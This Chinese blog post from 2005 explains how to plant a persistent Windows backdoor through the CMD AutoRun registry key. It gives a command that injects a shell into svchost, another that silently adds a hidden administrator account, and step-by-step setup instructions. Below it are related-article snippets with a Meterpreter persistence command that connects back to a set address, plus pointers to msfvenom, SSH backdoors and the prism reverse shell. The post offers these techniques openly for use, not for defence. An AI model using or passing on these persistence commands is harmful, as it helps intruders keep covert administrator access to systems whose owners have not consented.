后门

原创 2005年02月28日 14:25:00
Mix老装一幅正人君子的样子,说写文档,哼哼。。。。

无聊,cmd /?后看见好多东西,其中有个好玩的: 
******************* 
如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 
以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 
两个都存在,这两个变量会先被执行。 

HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun 

和/或 

HKEY_CURRENT_USER/Software/Microsoft/Command Processor/AutoRun 
****************** 
呵呵,又是一个放后门的好地方。我用@c:/InjShell.exe svchost.exe 1026 >nul 后,打开CMD什么异常现象都没有(当然不包括c:/InjShell.exe)。如果用net user mix /add & net localgroup administrators mix /add 岂不是成了《不死帐号》续集?大家自己琢磨吧~~~ 

有人问具体的做法,随手写写,还不懂的话,就是我的表达能力有问题了 :)呵呵 

先用regedit打开HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor或HKEY_CURRENT_USER/Software/Microsoft/Command Processor ,看见这个主健下是不是有AutoRun健,将AutoRun键值改为你想要得命令即可。比如我上面用的用@c:/InjShell.exe svchost.exe 1026 >nul ,有人使用cmd的话,就会自动执行你设置的命令。 

捡了一个非常淫荡的PHP后门,给跪了

  • h4ck0ne
  • h4ck0ne
  • 2016年01月23日 17:49
  • 4582

shift后门制作和禁止

一、什么是shift后门? shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。 其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞...
  • ru_li
  • ru_li
  • 2015年06月02日 10:34
  • 2322

Python入门:python自制后门程序

应该场景:1、当目标服务器上有python环境(一般linux系统都会预安装) 2、目标服务器上不允许安装其它工具(因为要留后门或进一步攻击内容就需要上传各种工具)#python3.5 #Autho...
  • foryouslgme
  • foryouslgme
  • 2016年11月29日 22:02
  • 1102

Meterpreter 建立持久后门 backdoor

安装后门方法一: meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is...
  • Three_fish
  • Three_fish
  • 2016年05月06日 17:56
  • 2176

某ssh后门试用

在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇...
  • bnxf00000
  • bnxf00000
  • 2015年04月23日 10:11
  • 1805

WEB容器内解决JSP后门的一种方式

JSP后门,本来是比较少的,但还是存在漏洞,被“有心之人”利用了,jsp后门主要从上传图片合并jsp后门,到服务器,后,执行jsp,包括所谓的菜刀,服务器中招之后,发现后门jsp,用nginx 方式禁...
  • chinajust
  • chinajust
  • 2016年06月02日 01:29
  • 1234

Linux系统安全之ssh后门

http://www.2cto.com/article/201309/242910.html 1.ssh -V #查看当前的ssh版本信息 #OpenSSH_5.3p1, OpenS...
  • lixiangyong123
  • lixiangyong123
  • 2017年03月16日 10:48
  • 461

kali linux 生成后门文件命令:PHP,java,Linux,windows,android

生成后门文件: 在这里需要用到一个命令:msfvenom 在Kali的终端这种直接输入msfvenom -h就可以查看相关的参数信息。 下面示例的参数的解释直接通过-h参数查看就好,...
  • lilywang20119
  • lilywang20119
  • 2017年11月13日 12:41
  • 248

解析网页后门和挂马

网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结...
  • iiprogram
  • iiprogram
  • 2008年03月31日 08:32
  • 2877

为linux留一个后门,做后备

在这里要为大家提供的是 prism,这个在github里面有,编译安装后,执行很简单,只需要执行一条命令,发送一条icmp,这样一条反弹shell就成了。有几点需要注意: 1. 密码是在文件里面修改...
  • vbaspdelphi
  • vbaspdelphi
  • 2016年11月17日 09:50
  • 1847
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:后门
举报原因:
原因补充:

(最多只允许输入30个字)